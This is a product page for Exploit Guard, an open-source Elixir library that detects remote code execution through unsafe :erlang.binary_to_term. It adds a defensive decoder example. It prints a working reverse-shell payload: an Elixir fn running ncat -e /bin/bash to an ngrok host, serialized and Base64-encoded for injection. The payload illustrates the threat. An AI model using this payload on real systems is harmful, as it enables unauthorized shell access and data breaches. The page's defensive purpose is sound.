Exploit Guard - Open Source Runtime Application Self Protection (RASP) for Elixir

Exploit Guard: Open Source Runtime Application Self Protection for Elixir

Exploit Guard is an Elixir library that helps you detect when a remote code execution (RCE) attack is happening against your application at runtime. This type of tool is referred to as RASP in infosec, and is a common requirement for businesses looking to adopt a language in a high-security environment (healthcare, banking, etc.). Exploit Guard is available in two versions:

Paid - Through Paraxial.io Application Secure

Open Source - GitHub - paraxialio/exploit_guard: Runtime application self protection for Elixir

The code running in your application is the same for both versions. The paid version includes enterprise support, webhook notifications, and metrics recording. The library is open source out of gratitude for the Elixir community, and will hopefully increase Elixir adoption by fulfilling a common security requirement.

How It Works

Consider a vulnerable application, Potion Shop, where an attacker can submit some malicious input that is passed to :erlang.binary_to_term. This results in a malicious function being created at runtime, allowing the attacker to gain a reverse shell, the equivalent of production SSH access. For more details on how this works, see Elixir/Phoenix Security: Remote Code Execution and Serialisation.

Consider the malicious function:

exploit =
  fn _, _ -> System.cmd("ncat", ["-e", "/bin/bash", "8.tcp.ngrok.io", "14544"]) end
  |> :erlang.term_to_binary()
  |> Base.url_encode64()

> "g3AAAAKmAiQ3HH0..."

This code will be executed on the victim server, where Potion Shop is running. The ncat command spawns a reverse shell, connecting back to the attacker's client. The attacker sends the Base64-encoded payload containing the malicious function (g3AAAAK..), and is able to connect to the running web server.

This is very bad. The attacker now has production access to the web server, an important foothold which leads to a data breach. When :erlang.binary_to_term returns a new function at runtime, that is an important signal. Exploit Guard detects this, and when running in block mode kills the relevant process.

The reverse shell connection fails, due to Exploit Guard.
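The same signal, a deserialized term that turns out to be a function, can also be checked at the point where untrusted input is decoded. The following is an added example, not Exploit Guard's own code; the SafeTerm module name and the constructed inputs in demo/0 are assumptions.

```elixir
# Added example (not Exploit Guard's code): a defensive wrapper around
# :erlang.binary_to_term that refuses any payload decoding to a function.
# The :safe option blocks new atoms and external funs but does not by itself
# reject anonymous functions, so the decoded term is walked and any fun
# found in a list, tuple or map is treated as an RCE attempt.
defmodule SafeTerm do
  @doc "Decodes a Base64url-encoded term; returns {:ok, term} or {:error, reason}."
  def decode(encoded) when is_binary(encoded) do
    with {:ok, bin} <- Base.url_decode64(encoded),
         {:ok, term} <- to_term(bin),
         :ok <- reject_functions(term) do
      {:ok, term}
    else
      :error -> {:error, :bad_base64}
      {:error, _} = err -> err
    end
  end

  # binary_to_term raises ArgumentError (badarg) on malformed or unsafe data.
  defp to_term(bin) do
    {:ok, :erlang.binary_to_term(bin, [:safe])}
  rescue
    ArgumentError -> {:error, :unsafe_or_malformed}
  end

  # Walk the decoded term; a function anywhere in it is the signal to reject.
  defp reject_functions(term) when is_function(term), do: {:error, :function_in_payload}
  defp reject_functions(list) when is_list(list), do: reject_all(list)
  defp reject_functions(tuple) when is_tuple(tuple), do: tuple |> Tuple.to_list() |> reject_all()
  defp reject_functions(map) when is_map(map), do: map |> Map.to_list() |> reject_all()
  defp reject_functions(_other), do: :ok

  defp reject_all(items) do
    Enum.find_value(items, :ok, fn item ->
      case reject_functions(item) do
        :ok -> nil
        error -> error
      end
    end)
  end

  # Constructed inputs (assumed, not from the page): a benign order map and a
  # payload carrying a harmless fun, both encoded the way the attack above is.
  def demo do
    benign = %{potion: "mana", qty: 3} |> :erlang.term_to_binary() |> Base.url_encode64()
    hostile = fn _, _ -> :noop end |> :erlang.term_to_binary() |> Base.url_encode64()
    # benign decodes to {:ok, %{potion: "mana", qty: 3}}; hostile to an {:error, _} tuple
    {decode(benign), decode(hostile)}
  end
end
```

Running `SafeTerm.demo()` in iex shows the benign map accepted and the fun-carrying payload rejected, either by :safe or by the walk, depending on the runtime.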

Blog post with more details - Exploit Guard: Open Source Runtime Application Self Protection for Elixir